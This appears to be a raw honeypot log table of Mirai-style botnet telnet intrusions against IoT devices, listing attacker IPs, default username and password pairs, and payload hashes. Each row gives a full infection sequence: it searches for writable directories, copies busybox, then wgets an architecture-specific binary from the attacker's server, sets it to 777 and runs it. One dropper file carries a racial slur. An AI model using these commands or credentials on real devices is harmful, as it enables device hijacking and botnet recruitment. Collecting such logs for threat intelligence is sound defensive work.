| IP address |
User name |
Password |
SHA256 of the payload file |
 193.239.147.195
| support | 123456 | 649b1d88c2d6844cca1e52612a1064321fae1dad09c5bd377c01cea2d656c231 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/ppc -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.ppc; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
193.239.147.195 | support | 123456 | 5d2cefa2054c45726ab4ace384e3afafad63104b0ecf2b65f2d1790e20878fc4 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/mpsl -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.mpsl; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
 134.122.22.81
| 2323 | | fd46041f59720863e3b3f8d2a57f87a74e00b227ce404cd7de56246fa5b25f3c |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://134.122.22.81:80/bins/sora.arm -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm; /bin/busybox BIGREP
/bin/busybox rm -rf dropper NiGGeR69xd
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://134.122.22.81:80/bins/sora.arm7 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm7; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
193.239.147.195 | pldtadmin | 1234567890 | 92a07fc66e18a94a587128dab05f55a9a6d98e1909df0feb83009ede72ee2dfc |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/arm -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.arm; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper hikariwashere
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/arm7 -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.arm7; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
193.239.147.195 | user | user | 92a07fc66e18a94a587128dab05f55a9a6d98e1909df0feb83009ede72ee2dfc |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/arm -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.arm; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper hikariwashere
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/arm7 -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.arm7; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
193.239.147.195 | admin | 12345 | 5d2cefa2054c45726ab4ace384e3afafad63104b0ecf2b65f2d1790e20878fc4 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/mpsl -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.mpsl; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
193.239.147.195 | default | OxhlwSG8 | 649b1d88c2d6844cca1e52612a1064321fae1dad09c5bd377c01cea2d656c231 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/ppc -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.ppc; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |
193.239.147.195 | daemon | | 435d4347b55eb80bd63a6863c4d881e76acfa26ab4f84382973fe15658d2c463 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf hikariwashere hikaridropper
/bin/busybox cp /bin/busybox hikariwashere; >hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox LIGHT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox LIGHT
/bin/busybox wget http://193.239.147.195:80/GenesisBrain/sh4 -O - > hikariwashere; /bin/busybox chmod 777 hikariwashere; /bin/busybox LIGHT
./hikariwashere telnet.sh4; /bin/busybox DARK
/bin/busybox rm -rf hikaridropper; >hikariwashere; /bin/busybox LIGHT |